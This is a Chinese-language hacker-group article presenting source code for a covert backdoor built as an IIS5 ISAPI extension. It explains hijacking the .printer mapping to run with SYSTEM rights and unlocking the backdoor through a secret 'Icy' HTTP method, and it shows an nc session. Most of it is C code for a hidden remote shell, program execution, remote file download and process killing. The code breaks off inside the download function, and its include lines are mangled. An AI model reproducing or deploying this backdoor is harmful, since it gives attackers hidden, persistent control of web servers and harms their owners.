IIS5 ISAPI Extension Back Door
Our Team: http://www.ph4nt0m.org
Author: 云舒([email protected])
感谢与参考
1.在获取shell的时候格式很难看,envymask告诉我是网络延迟的原因,得以解决,感谢!
2.参考《绿盟安全月刊》第37期的技术专题里面的第五章《Exploit Microsoft INTERNET INFORMATION SERVER》,地址为http://www.nsfocus.net/index.php?act=magazine&do=view∣=1662
3.参考MSDN函数库
一.前言
二.申明
三.实现
四.参考
一.前言
最近的sql injection攻击很流行,一般的解决方法是使用通用的防注入函数来保护程序不受威胁。但是有写些序作者经常忘记包含通用函数,导致没有效果。前些日子研究彻底防止SQL Injection攻击时,看了些IIS5的ISAPI Filter文档,决定利用IIS提供的API接口做个东西,这样可以很好的防止sql injection攻击。
凑巧发现,这样依附在IIS上面的扩展模块,还可以作为别的用处,比如作为一个后门程序。这样进程的隐藏,端口的隐藏,服务的隐藏问题都不需要解决,由IIS包办了。作为后门,为了隐蔽性,我选择了ISAPI Extension接口。前后大约一个多星期,做出了一个这样的东西,还不知道叫什么名字好。
二.申明
1.代码里面有些特殊字符,因为我忘记不了她,请自己修改。
2.代码可以随意转载,但是请保证文档完整,并不得用于商业用途。
3.代码可以随意修改,但是如果能够给我一份,将不胜感激。
4.代码我只是演示这种后门的危害,用做任何用途均与我无关。
三.实现
1.解析
鉴于隐蔽性,我没有选择ISAPI Filter,而是选择了ISAPI Extension方式。ISAPI Extension是IIS的功能扩展模块,它能独立支持某一项特殊的HTTP请求,系统默认支持的asp脚本由%SystemRoot%\system32\inetsrv\inetsrv\asp.dll解析。自己实现一个动态连接库,就可以实现自己特殊的功能,例如php就是利用自己带的dll文件来解析php文件的。IIS先获取请求文件的扩展名,再根据配置的应用程序映射,交由特定的dll处理。
2.权限
IIS5的配置都保存在%SystemRoot%\system32\inetsrv\MetaBase.bin文件中,它有两个主键:LM和Schema。LM主键下面有W3SVC/InProcessIsapiApps键,这是一个数组,里面包含的是一组指向一些ISAPI的路径。在这个数组里面的ISAPI运行的时候都是由inetinfo.exe直接启动的,继承inetinfo.exe的local system权限;而不在其中的ISAPI则是由svchost.exe派生的dllhost.exe进程启动的,运行的身份是IWAM_NAME,权限极低。这里,我们可以使用iis的脚本adsutil.vbs将我们的dll加到数组当中,命令为adsutil.vbs set w3svc/inprocessisapiapps Dll Path。更好的办法是替换掉printer扩展的映射,此映射由%systemroot%\msw3prt.dll来解析,而且这个dll文件默认存在于W3SVC/InProcessIsapiApps键中。这也就是2000年.printer溢出得到system权 限的原因。
3.导出
根据MSDN描述,ISAPI Extension需要导出三个函数,GetExtensionVersion,TerminateExtension以及HttpExtensionProc
4.功能
首先,密码功能肯定是需要的,这里我将标准的HTTP协议扩充出一个Icy方法,如果客户端使用此方法请求注册的映射,则认证成功,否则不予理睬。这里,你也可以修改代码,使用HTTP协议的其他部分做认证,比如Accept字段。
其次,后门主要是获取一个shell,但是某些服务器可能设置了禁止system访问cmd,因此,我还提供了下载功能,这样可以下载一个cmd,然后通过shell CustomerCmd运行,得到shell执行命令。最后就是列举进程和查杀进程了。
在虚拟机上测试,我注册了扩展名为yunshu交由此dll解析。使用nc连接,发送自己扩展的http协议,屏幕copy如下:
C:>nc -vv 192.168.10.250 80
Warning: forward host lookup failed for Icy.missyou.com: h_errno 11004:NO_DATA
Icy.missyou.com [192.168.10.250] 80 (http) open: unknown socket error
Icy /test.yunshu HTTP/1.0
HOST: 192.168.10.250
Can you tell me how to forget some one?
Code by 云舒
Our team:www.ph4nt0m.org
Icy>help
Now,Support these command:
pslist--------------List Process Information
kill PID------------Kill The Process
exec Program--------Run A Program
shell ShellPath-----Get A System Shell,Normal shell cmd.exe
down URL------------DownLoad A File
exit----------------Exit
Icy>
5.代码
// ISAPI EXTENSION BACK DOOR
// Code by 云舒
// Thx EnvyMask
// 修改2005-08-14凌晨
// 最后2005-08-16
// Compiled On: Windows Server2003,VC++ 6.0
#include
1<stdio.h>
2#include <string.h>
3#include <windows.h>
4#include <tlhelp32.h>
5#include <httpext.h>
6#include <urlmon.h>
7
8#pragma comment(lib, "urlmon.lib")
9
10#define DEBUG
11#define LOGPATH "c:\ISAPI_LOG.txt"
12
13//后门密码
14#define PASSWORD "Icy"
15
16//标识符
17#define FLAG "Icy>"
18
19//缓冲区大小
20#define BUFFSIZE 1024 * 4
21#define ARGSIZE 1024
22
23typedef struct workArg
24{
25EXTENSION_CONTROL_BLOCK *pECB;
26char arg[ARGSIZE];
27}WORKARG;
28
29//定义函数原形
30BOOL StartWith( char * , char * ); //判断第一个字符串是否以第二个字符串开头
31void SwitchCmd( EXTENSION_CONTROL_BLOCK * , char * ); //根据输入的命令来选择执行的功能
32void PsList( EXTENSION_CONTROL_BLOCK * ); //列举进程
33void Kill( LPVOID ); //杀进程
34void Shell( LPVOID ); //获取一个shell
35void ExecProgram( LPVOID ); //运行一个程序
36void Help( EXTENSION_CONTROL_BLOCK * ); //输出帮助
37void DownLoad( LPVOID ); //下载文件
38BOOL SendToClient( EXTENSION_CONTROL_BLOCK * , char * ); //发送数据到客户端
39void LogStrToFile( char * ); //记录字符错误信息到日志
40void LogIntToFile( int ); //记录整数信息到日志
41
42//DLL入口
43BOOL APIENTRY DllMain( HANDLE hModule,
44DWORD ul_reason_for_call,
45LPVOID lpReserved )
46{
47return TRUE;
48}
49
50//版本信息
51BOOL WINAPI GetExtensionVersion(HSE_VERSION_INFO *pVer)
52{
53pVer->dwExtensionVersion = MAKELONG(HSE_VERSION_MINOR,HSE_VERSION_MAJOR);
54strcpy( pVer->lpszExtensionDesc, "What_Can_I_Do?" );
55
56return TRUE;
57}
58
59
60BOOL WINAPI TerminateExtension( DWORD dwFlags )
61{
62return TRUE;
63}
64
65DWORD WINAPI HttpExtensionProc(EXTENSION_CONTROL_BLOCK * pECB)
66{
67char buff[BUFFSIZE] = { 0 };
68char *err = "Error...\n";
69char *helo = "Can you tell me how to forget some one?\nCode by 云舒\nOur team:www.ph4nt0m.org\n\n";
70
71DWORD dwBytes = 64;
72
73//获取客户端密码,连接到web服务器,发送请求,请求方式为密码
74pECB->GetServerVariable( pECB->ConnID , "REQUEST_METHOD" , buff , &dwBytes );
75
76if ( strncmp( buff , PASSWORD , strlen(PASSWORD) ) != 0 )
77{
78SendToClient( pECB , err );
79return HSE_STATUS_SUCCESS;
80}
81
82#ifdef DEBUG
83LogStrToFile( "-------------------------------\n" );
84LogStrToFile( "客户端成功登陆\n" );
85#endif
86
87SendToClient( pECB , helo );
88SendToClient( pECB , FLAG );
89
90while(TRUE)
91{
92ZeroMemory( buff , BUFFSIZE );
93dwBytes = BUFFSIZE;
94
95while( buff[0] == '' )//判断是否是空串
96{
97Sleep(1000);
98pECB->ReadClient( pECB->ConnID , buff , &dwBytes );
99}
100
101if( strcmp( buff , "exit\n" ) == 0 )
102{
103SendToClient( pECB , "ByeBye...\n" );
104break;
105}
106
107SwitchCmd( pECB , buff );
108}
109
110return HSE_STATUS_SUCCESS;
111}
112
113void SwitchCmd( EXTENSION_CONTROL_BLOCK *pECB , char *buff )
114{
115WORKARG workArg;
116HANDLE hThread = NULL;
117DWORD threadID = 0;
118
119//SendToClient( pECB , "客户端命令: " );
120//SendToClient( pECB , buff );
121
122#ifdef DEBUG
123LogStrToFile( "客户端命令: " );
124LogStrToFile( buff );
125#endif
126
127//去掉命令里面的回车符
128*(strchr( buff , '\n' )) = '';
129
130//参数不能超过ARGSIZE
131if( strlen( buff+5 ) >= ARGSIZE )
132{
133SendToClient( pECB , "Arguments is too long...\n" );
134SendToClient( pECB , FLAG );
135
136return;
137}
138
139//将要传递给新线程的参数清空
140ZeroMemory( workArg.arg , sizeof(workArg.arg) );
141
142//如果是pslist命令,列举进程
143if( StartWith(buff , "pslist") )
144{
145hThread = CreateThread( NULL ,
1460 ,
147(LPTHREAD_START_ROUTINE)PsList ,
148(LPVOID)pECB ,
1490 ,
150&threadID );
151
152if( hThread == NULL )
153{
154#ifdef DEBUG
155LogStrToFile( "创建线程列举进程失败,错误码: " );
156LogIntToFile( GetLastError( ) );
157LogStrToFile( "\n" );
158#endif
159
160SendToClient( pECB , "List process error...\n" );
161SendToClient( pECB , FLAG );
162
163return;
164}
165
166WaitForSingleObject( hThread , 6000 );
167CloseHandle( hThread );
168SendToClient( pECB , FLAG );
169
170return;
171}
172
173//kill命令,杀进程
174else if( StartWith(buff , "kill") )
175{
176//如果没有参数
177if( *( buff+5 ) == '' )
178{
179SendToClient( pECB , "Usage:kill pid\n" );
180SendToClient( pECB , FLAG );
181
182return;
183}
184
185workArg.pECB = pECB;
186strcpy( workArg.arg , buff+5 );
187
188hThread = CreateThread( NULL ,
1890 ,
190(LPTHREAD_START_ROUTINE)Kill ,
191(LPVOID)&workArg ,
1920 ,
193&threadID );
194
195if( hThread == NULL )
196{
197#ifdef DEBUG
198LogStrToFile( "创建线程杀进程失败,错误码: " );
199LogIntToFile( GetLastError( ) );
200LogStrToFile( "\n" );
201#endif
202
203SendToClient( pECB , "Kill process error...\n" );
204SendToClient( pECB , FLAG );
205
206return;
207}
208WaitForSingleObject( hThread , 5000 );
209CloseHandle( hThread );
210SendToClient( pECB , FLAG );
211
212return;
213}
214
215//shell命令,运行一个cmd获取shell,为防止主机设置权限,需指明cmd路径
216else if( StartWith(buff , "shell") )
217{
218//如果没有参数
219if( *( buff+6 ) == '' )
220{
221SendToClient( pECB , "Usage:shell ShellPath\n" );
222SendToClient( pECB , FLAG );
223
224return;
225}
226
227workArg.pECB = pECB;
228strcpy( workArg.arg , buff+6 );
229
230hThread = CreateThread( NULL ,
2310 ,
232(LPTHREAD_START_ROUTINE)Shell ,
233(LPVOID)&workArg ,
2340 ,
235&threadID );
236
237if( hThread == NULL )
238{
239#ifdef DEBUG
240LogStrToFile( "创建线程执行shell失败,错误码: " );
241LogIntToFile( GetLastError( ) );
242LogStrToFile( "\n" );
243#endif
244
245SendToClient( pECB , "Get shell error...\n" );
246SendToClient( pECB , FLAG );
247
248return;
249}
250WaitForSingleObject( hThread , INFINITE );
251CloseHandle( hThread );
252
253return;
254}
255
256else if( StartWith(buff , "exec") )
257{
258//如果没有参数
259if( *( buff+5 ) == '' )
260{
261SendToClient( pECB , "Usage:shell ShellPath\n" );
262SendToClient( pECB , FLAG );
263
264return;
265}
266
267workArg.pECB = pECB;
268strcpy( workArg.arg , buff+5 );
269
270hThread = CreateThread( NULL ,
2710 ,
272(LPTHREAD_START_ROUTINE)ExecProgram ,
273(LPVOID)&workArg ,
2740 ,
275&threadID );
276
277if( hThread == NULL )
278{
279#ifdef DEBUG
280LogStrToFile( "创建线程运行程序失败,错误码: " );
281LogIntToFile( GetLastError( ) );
282LogStrToFile( "\n" );
283#endif
284
285SendToClient( pECB , "Execute program error...\n" );
286SendToClient( pECB , FLAG );
287
288return;
289}
290WaitForSingleObject( hThread , 10000 );
291CloseHandle( hThread );
292
293return;
294}
295
296//down命令,利用http协议下载文件
297else if( StartWith(buff , "down") )
298{
299//如果没有参数
300if( *( buff+5 ) == '' )
301{
302SendToClient( pECB , "Usage:down http://www.andsky.com/test.exe\n" );
303SendToClient( pECB , FLAG );
304
305return;
306}
307
308workArg.pECB = pECB;
309strcpy( workArg.arg , buff+5 );
310
311hThread = CreateThread( NULL ,
3120 ,
313(LPTHREAD_START_ROUTINE)DownLoad ,
314(LPVOID)&workArg ,
3150 ,
316&threadID );
317
318if( hThread == NULL )
319{
320#ifdef DEBUG
321LogStrToFile( "创建线程下载文件失败,错误码: " );
322LogIntToFile( GetLastError( ) );
323LogStrToFile( "\n" );
324#endif
325
326SendToClient( pECB , "Download file error...\n" );
327SendToClient( pECB , FLAG );
328
329return;
330}
331WaitForSingleObject( hThread , INFINITE );
332CloseHandle( hThread );
333SendToClient( pECB , FLAG );
334
335return;
336}
337
338//命令不正确,输出帮助
339else
340{
341hThread = CreateThread( NULL ,
3420 ,
343(LPTHREAD_START_ROUTINE)Help ,
344(LPVOID)pECB ,
3450 ,
346&threadID );
347
348if( hThread == NULL )
349{
350#ifdef DEBUG
351LogStrToFile( "创建线程输出帮助信息失败,错误码: " );
352LogIntToFile( GetLastError( ) );
353LogStrToFile( "\n" );
354#endif
355
356SendToClient( pECB , "Print help error...\n" );
357SendToClient( pECB , FLAG );
358
359return;
360}
361WaitForSingleObject( hThread , 5000 );
362CloseHandle( hThread );
363SendToClient( pECB , FLAG );
364
365return;
366}
367}
368
369//判断字符串buf1是否以buf2开头,是返回真
370BOOL StartWith( char *buf1, char *buf2 )
371{
372int len = strlen(buf2);
373
374if( memcmp( buf1,buf2,len) == 0)
375{
376return TRUE;
377}
378return FALSE;
379}
380
381//运行shell
382void Shell( LPVOID arg )
383{
384WORKARG *workArg = (WORKARG *)arg;
385
386SECURITY_ATTRIBUTES sa;
387HANDLE hReadPipe1,hWritePipe1,hReadPipe2,hWritePipe2;
388STARTUPINFO si;
389PROCESS_INFORMATION procInfo;
390char cmdLine[ARGSIZE] = { 0 };
391char buff[BUFFSIZE] = { 0 };
392int ret = 0;
393unsigned long dwBytes = 0;
394int index = 0;
395
396EXTENSION_CONTROL_BLOCK *pECB = workArg->pECB;
397
398strcpy( cmdLine , workArg->arg );
399
400if( cmdLine[0] == '' )
401{
402#ifdef DEBUG
403LogStrToFile( "执行shell时,没有要输入要运行的shell路径\n" );
404#endif
405
406SendToClient( pECB , "No shell to run...\n" );
407SendToClient( pECB , FLAG );
408
409return;
410}
411
412#ifdef DEBUG
413LogStrToFile( "要运行的程序: " );
414LogStrToFile( workArg->arg );
415LogStrToFile( "\n" );
416#endif
417
418//安全选项
419sa.nLength = sizeof( sa );
420sa.lpSecurityDescriptor = 0;
421sa.bInheritHandle = TRUE;
422
423//初始化管道
424if( !CreatePipe(&hReadPipe1,&hWritePipe1,&sa,0) )
425{
426#ifdef DEBUG
427LogStrToFile( "建立管道失败: " );
428LogIntToFile( GetLastError() );
429LogStrToFile( "\n" );
430#endif
431
432SendToClient( pECB , "Create pipi error...\n" );
433SendToClient( pECB , FLAG );
434
435return;
436}
437
438if( !CreatePipe(&hReadPipe2,&hWritePipe2,&sa,0) )
439{
440#ifdef DEBUG
441LogStrToFile( "建立管道失败: " );
442LogIntToFile( GetLastError() );
443LogStrToFile( "\n" );
444#endif
445
446SendToClient( pECB , "Create pipi error...\n" );
447SendToClient( pECB , FLAG );
448
449return;
450}
451
452ZeroMemory( &si , sizeof(STARTUPINFO) );
453GetStartupInfo( &si );
454
455si.cb = sizeof( si );
456si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
457si.wShowWindow = SW_HIDE;
458si.hStdInput = hReadPipe2;
459si.hStdOutput = si.hStdError = hWritePipe1;
460
461ZeroMemory( &procInfo , sizeof(PROCESS_INFORMATION) );
462
463ret = CreateProcess( NULL , cmdLine , NULL , NULL , 1 , 0 , NULL , NULL , &si , &procInfo );
464if( !ret )
465{
466#ifdef DEBUG
467LogStrToFile( "建立进程失败...\n" );
468LogIntToFile( GetLastError() );
469#endif
470
471SendToClient( pECB , "Create process error...\n" );
472SendToClient( pECB , FLAG );
473
474return;
475}
476
477while(1)
478{
479memset( buff , 0 , BUFFSIZE );
480
481ret=PeekNamedPipe( hReadPipe1 , buff , BUFFSIZE , &dwBytes , NULL , NULL );
482
483//尝试5次读取管道,防止延迟发生错误
484for( index = 0; index < 5 && dwBytes == 0; index ++ )
485{
486Sleep(100);
487ret = PeekNamedPipe(hReadPipe1,buff,BUFFSIZE,&dwBytes,NULL,NULL);
488}
489
490//获取输出信息,输出到客户端
491if(dwBytes)
492{
493ret = ReadFile( hReadPipe1,buff,dwBytes,&dwBytes,0 );
494if( !ret )
495{
496#ifdef DEBUG
497LogStrToFile( "读取输出失败: " );
498LogIntToFile( GetLastError() );
499LogStrToFile( "\n" );
500#endif
501
502break;
503}
504
505#ifdef DEBUG
506LogStrToFile( buff );
507#endif
508
509ret = SendToClient( pECB , buff );
510if( ret<=0 )
511{
512#ifdef DEBUG
513LogStrToFile( "发送输出失败:" );
514LogIntToFile( GetLastError() );
515LogStrToFile( "\n" );
516#endif
517
518break;
519}
520}
521
522//从客户端获取命令
523else
524{
525//客户端无输入则循环读取
526while( buff[0] == '' )
527{
528Sleep(100);
529dwBytes = BUFFSIZE;
530
531pECB->ReadClient( pECB->ConnID , buff , &dwBytes );
532}
533
534#ifdef DEBUG
535LogStrToFile( "读到客户命令了,内容是: " );
536LogStrToFile( buff );
537#endif
538
539//如果是exit命令,退出连接
540if( strcmp( buff , "exit\n" ) == 0 )
541{
542SendToClient( pECB , "ByeBye~!\n" );
543break;
544}
545
546ret = WriteFile( hWritePipe2 , buff , dwBytes , &dwBytes , 0 );
547if( !ret )
548{
549#ifdef DEBUG
550LogStrToFile( "把命令发送到shell失败\n" );
551LogIntToFile( GetLastError() );
552LogStrToFile( "\n" );
553#endif
554
555break;
556}
557}
558}
559CloseHandle(hReadPipe1);
560CloseHandle(hReadPipe2);
561CloseHandle(hWritePipe1);
562CloseHandle(hWritePipe2);
563
564TerminateProcess( procInfo.hProcess , 0 );
565
566return;
567}
568
569//运行一个程序
570void ExecProgram( LPVOID arg )
571{
572WORKARG *workArg = (WORKARG *)arg;
573
574SECURITY_ATTRIBUTES sa;
575HANDLE hReadPipe1 = NULL;
576HANDLE hWritePipe1 = NULL;
577STARTUPINFO si;
578PROCESS_INFORMATION procInfo;
579char cmdLine[ARGSIZE] = { 0 };
580char buff[BUFFSIZE] = { 0 };
581int ret = 0;
582unsigned long dwBytes = 0;
583
584EXTENSION_CONTROL_BLOCK *pECB = workArg->pECB;
585
586strcpy( cmdLine , workArg->arg );
587
588if( cmdLine[0] == '' )
589{
590#ifdef DEBUG
591LogStrToFile( "执行程序时,没有要输入要运行的程序\n" );
592#endif
593
594SendToClient( pECB , "No program to run...\n" );
595SendToClient( pECB , FLAG );
596
597return;
598}
599
600#ifdef DEBUG
601LogStrToFile( "要运行的程序: " );
602LogStrToFile( workArg->arg );
603LogStrToFile( "\n" );
604#endif
605
606//安全选项
607sa.nLength = sizeof( sa );
608sa.lpSecurityDescriptor = 0;
609sa.bInheritHandle = TRUE;
610
611//初始化管道
612if( !CreatePipe(&hReadPipe1,&hWritePipe1,&sa,0) )
613{
614#ifdef DEBUG
615LogStrToFile( "建立管道失败: " );
616LogIntToFile( GetLastError() );
617LogStrToFile( "\n" );
618#endif
619
620SendToClient( pECB , "Create pipi error...\n" );
621SendToClient( pECB , FLAG );
622
623return;
624}
625
626ZeroMemory( &si , sizeof(STARTUPINFO) );
627GetStartupInfo( &si );
628
629si.cb = sizeof( si );
630si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
631si.wShowWindow = SW_HIDE;
632si.hStdOutput = si.hStdError = hWritePipe1;
633
634ZeroMemory( &procInfo , sizeof(PROCESS_INFORMATION) );
635
636ret = CreateProcess( NULL , cmdLine , NULL , NULL , 1 , 0 , NULL , NULL , &si , &procInfo );
637if( !ret )
638{
639#ifdef DEBUG
640LogStrToFile( "建立进程失败...\n" );
641LogIntToFile( GetLastError() );
642#endif
643
644SendToClient( pECB , "Create process error...\n" );
645SendToClient( pECB , FLAG );
646
647return;
648}
649
650memset( buff , 0 , BUFFSIZE );
651
652//读取程序输出
653while( dwBytes == 0 )
654{
655Sleep(200);
656ret = PeekNamedPipe(hReadPipe1,buff,BUFFSIZE,&dwBytes,NULL,NULL);
657}
658
659ret = ReadFile( hReadPipe1,buff,dwBytes,&dwBytes,0 );
660if( !ret )
661{
662#ifdef DEBUG
663LogStrToFile( "读取输出失败: " );
664LogIntToFile( GetLastError() );
665LogStrToFile( "\n" );
666#endif
667}
668
669#ifdef DEBUG
670LogStrToFile( buff );
671#endif
672
673ret = SendToClient( pECB , buff );
674if( ret<=0 )
675{
676#ifdef DEBUG
677LogStrToFile( "发送输出失败:" );
678LogIntToFile( GetLastError() );
679LogStrToFile( "\n" );
680#endif
681}
682
683CloseHandle(hReadPipe1);
684CloseHandle(hWritePipe1);
685
686TerminateProcess( procInfo.hProcess , 0 );
687
688return;
689}
690
691void PsList( EXTENSION_CONTROL_BLOCK *pECB )
692{
693HANDLE hProcessSnap = NULL;
694HANDLE hProcess = NULL;
695PROCESSENTRY32 pe32;
696char psBuff[BUFFSIZE] = { 0 };
697
698SendToClient( pECB , "Process Information List 0.1\n\n" );
699/*
700SendToClient( pECB , "Code by 云舒([email protected])\n" );
701SendToClient( pECB , "www.ph4nt0m.org www.icylife.net\n" );
702*/
703
704hProcessSnap = CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 );
705if( hProcessSnap == INVALID_HANDLE_VALUE )
706{
707#ifdef DEBUG
708LogStrToFile( "Call CreateToolhelp32Snapshot error" );
709LogIntToFile( GetLastError() );
710#endif
711
712SendToClient( pECB , "List process information error...\n" );
713
714return;
715}
716
717pe32.dwSize = sizeof( PROCESSENTRY32 );
718
719if( !Process32First( hProcessSnap, &pe32 ) )
720{
721#ifdef DEBUG
722LogStrToFile( "Call Process32First error" );
723LogIntToFile( GetLastError() );
724#endif
725
726SendToClient( pECB , "List process information error...\n" );
727
728SendToClient( pECB , FLAG );
729
730CloseHandle( hProcessSnap );
731
732return;
733}
734
735SendToClient( pECB , "PID\t\tProcessName\n" );
736
737do
738{
739ZeroMemory( psBuff , sizeof(psBuff) );
740sprintf( psBuff , "%d\t\t%s\n", pe32.th32ProcessID , pe32.szExeFile );
741
742SendToClient( pECB , psBuff );
743}
744while( Process32Next( hProcessSnap, &pe32 ) );
745
746return;
747}
748
749void Kill( LPVOID arg )
750{
751WORKARG *workArg = (WORKARG *)arg;
752
753HANDLE hProcess = NULL;
754DWORD pID;
755
756EXTENSION_CONTROL_BLOCK *pECB = workArg->pECB;
757
758HANDLE hToken;
759LUID sedebugnameValue;
760TOKEN_PRIVILEGES tkp;
761
762pID = atoi( workArg->arg );
763
764if ( !OpenProcessToken( GetCurrentProcess() , TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY , &hToken ) )
765{
766#ifdef DEBUG
767LogStrToFile( "Call OpenProcessToken error" );
768LogIntToFile( GetLastError() );
769#endif
770
771SendToClient( pECB , "Kill process error...\n" );
772
773return;
774}
775
776if ( !LookupPrivilegeValue( NULL, SE_DEBUG_NAME, &sedebugnameValue ) )
777{
778#ifdef DEBUG
779LogStrToFile( "Call LookupPrivilegeValue error" );
780LogIntToFile( GetLastError() );
781#endif
782
783SendToClient( pECB , "Kill process error...\n" );
784
785return;
786}
787
788tkp.PrivilegeCount = 1;
789tkp.Privileges[0].Luid = sedebugnameValue;
790tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
791
792AdjustTokenPrivileges( hToken, FALSE, &tkp, sizeof(tkp), NULL, NULL );
793
794CloseHandle( hToken );
795
796hProcess = OpenProcess( PROCESS_TERMINATE , FALSE , pID );
797if( hProcess ==INVALID_HANDLE_VALUE || hProcess == NULL )
798{
799#ifdef DEBUG
800LogStrToFile( "Call OpenProcess error" );
801LogIntToFile( GetLastError() );
802#endif
803
804SendToClient( pECB , "Kill process error...\n" );
805
806CloseHandle( hToken );
807CloseHandle( hProcess );
808
809return;
810}
811
812if ( !TerminateProcess( hProcess, (DWORD) -1 ) )
813{
814#ifdef DEBUG
815LogStrToFile( "Call TerminateProcess error" );
816LogIntToFile( GetLastError() );
817#endif
818
819SendToClient( pECB , "Kill process error...\n" );
820
821CloseHandle( hToken );
822CloseHandle( hProcess );
823
824return;
825}
826
827SendToClient( pECB , "killed ok\n" );
828
829CloseHandle( hToken );
830CloseHandle( hProcess );
831return;
832}
833
834void DownLoad( LPVOID arg )
835{
836WORKARG *workArg = (WORKARG *)arg;
837
838char fileName[64] = { 0 };//保存的文件名</urlmon.h></httpext.h></tlhelp32.h></windows.h></string.h></stdio.h>